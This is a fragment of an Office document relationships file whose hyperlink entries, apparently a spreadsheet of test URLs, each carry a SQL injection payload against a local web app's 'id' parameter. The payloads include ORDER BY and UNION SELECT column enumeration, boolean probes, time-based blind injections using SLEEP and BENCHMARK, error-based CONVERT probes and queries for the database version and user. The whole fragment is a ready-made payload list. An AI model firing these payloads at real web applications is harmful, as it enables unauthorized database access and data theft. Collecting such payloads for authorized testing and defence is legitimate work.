Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%209%23%20" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%201%20" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3&amp;&amp;SLEEP(5)--" TargetMode="External"/><Relationship Id="rId547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20" TargetMode="External"/><Relationship Id="rId589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2020%23%20" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),3" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16%23" TargetMode="External"/><Relationship Id="rId407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%23" TargetMode="External"/><Relationship Id="rId44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--%20" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13%23" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5%23" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23" TargetMode="External"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)))%23" TargetMode="External"/><Relationship Id="rId516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%209--%20" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2012%20" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23" TargetMode="External"/><Relationship Id="rId558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--%20" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%207300=7300%20AND%20'pKlZ'='pKlZ" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4" TargetMode="External"/><Relationship Id="rId47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%23" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20HAVING%201=0%23" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2020--%20" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2023%20" TargetMode="External"/><Relationship Id="rId527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26" TargetMode="External"/><Relationship Id="rId569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8%23" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2031337--%20" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4346=4346)%20THEN%200x61646d696e%20ELSE%200x28%20END))%20AND%20'Txws'='" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11--%20" TargetMode="External"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25" TargetMode="External"/><Relationship Id="rId429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--%20" TargetMode="External"/><Relationship Id="rId580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),3,4--%20" TargetMode="External"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)))--%20" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=1" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10%23" TargetMode="External"/><Relationship Id="rId482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))" TargetMode="External"/><Relationship Id="rId538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7--%20" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2011%23%20" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3sleep(5)%23" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--%20" TargetMode="External"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7%23" TargetMode="External"/><Relationship Id="rId591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),3,4%23" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5(%27A%27)),4,5,6,7,8,9,10,11,12,13,14--%20" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=0--" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26" TargetMode="External"/><Relationship Id="rId45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--%20" TargetMode="External"/><Relationship Id="rId49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" TargetMode="External"/><Relationship Id="rId507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6" TargetMode="External"/><Relationship Id="rId549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--%20" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2011--%20" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%203%20" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%207300=7300%20AND%20('pKlZ'='pKlY" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18%23" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20SLEEP(5)--%20" TargetMode="External"/><Relationship Id="rId560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--%20" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2022%23%20" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14%23" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(%27A%27)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7%23" TargetMode="External"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))%23" TargetMode="External"/><Relationship Id="rId518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2014%20" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,3,1))='X'" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2--%20" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2022--%20" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%20SLEEP(5)%23" TargetMode="External"/><Relationship Id="rId571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10%23" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20HAVING%201=0--%20" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6" TargetMode="External"/><Relationship Id="rId431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--%20" TargetMode="External"/><Relationship Id="rId47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%23" TargetMode="External"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=1%23" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2025%20" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13--%20" TargetMode="External"/><Relationship Id="rId540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9--%20" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%202%23%20" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27" TargetMode="External"/><Relationship Id="rId582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%201=0" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--%20" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--%20" TargetMode="External"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%22%20or%20sleep(5)%23" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12%23" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--%20" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%202--%20" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2013%23%20" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9%23" TargetMode="External"/><Relationship Id="rId551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20" TargetMode="External"/><Relationship Id="rId593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%27%20AND%20(SELECT%209105%20FROM%20(SELECT(SLEEP(5)))WTmQ)%20AND%20%27Seyf%27=%27Seyf" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6%23" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--%20" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5)--%20" TargetMode="External"/><Relationship Id="rId45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--%20" TargetMode="External"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%205%20" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23" TargetMode="External"/><Relationship Id="rId49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" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%201=1--%20" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2013--%20" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2024%23%20" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 